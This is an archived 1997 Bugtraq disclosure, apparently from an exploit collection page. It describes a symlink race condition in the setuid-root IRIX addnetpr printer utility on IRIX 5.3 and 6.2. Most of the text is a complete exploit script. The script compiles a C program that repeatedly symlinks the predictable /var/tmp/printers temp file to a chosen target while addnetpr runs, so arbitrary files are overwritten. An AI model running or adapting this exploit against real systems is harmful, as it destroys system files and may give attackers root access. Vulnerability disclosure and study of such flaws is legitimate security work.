IRIX addnetpr race condition
Description: IRIX's addnetpr program has a symlink race condition that allows the clobbering of arbitrary files.
Author: Jaechul Choe <poison@COSMOS.KAIST.AC.KR>
Compromise: Cause addnetpr to write to arbitrary files. It is unclear whether it appends to or overwrites already existing files. Could probably lead to root access.
Vulnerable Systems: IRIX 5.3, 6.2
Date: 9 May 1997
Date: Fri, 9 May 1997 06:33:46 +0900
From: Jaechul Choe <poison@COSMOS.KAIST.AC.KR>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Irix: misc
Wow, your works are so fertile and wonderful.
Let me add some stuff.
[. . .]
There was the same race condition in the program, /usr/lib/addnetpr, another
suid root program for print.
Here is the exploit script for it.
But though I tried, it was hard to find the way to get root with it.
It can fill the target with the two arguments of addnetpr, but with some
messages unable to control.
And it will prompt the window asking root passwd to non-privileged (not root,
but irix-specific privileged) users.
Privileged users bypass the window and can run the race.
Tested both IRIX 5.3 and 6.2
---------------)<-----------cut expnetpr.sh---------------)<----------------
#!/bin/sh
PROG="`basename $0`"
if [ $# -ne 1 ]; then
echo "Usage: $PROG <target>"
exit 1
fi
cat > expnetpr.c << _CREDIT_TO_ZOMO_
void main(int argc, char *argv[])
{
char *template = "/var/tmp/printersXXXXXX";
char *target;
int pid;
target = (char *)mktemp(template);
if ((pid = fork()) > 0) {
sleep(3);
umask(0);
execl("/usr/lib/addnetpr", "addnetpr", "localhost", "+", 0);
}
else
while(1) {
symlink(argv[1], target);
unlink(target);
}
}
_CREDIT_TO_ZOMO_
/bin/cc expnetpr.c -o expnetpr
if [ ! -f expnetpr ]; then
echo "Couldn't compile expnetpr.c, lame! \nMake sure that C compiler has been installed from the IDO"
exit 1
fi
while(`true`)
do
./expnetpr $1&
PID=$!
sleep 15
ls -al $1
killall expnetpr
killall addnetpr
done
--------------------)<------------ cut ---------------)<-------------------
This page is part of Fyodor's exploit world.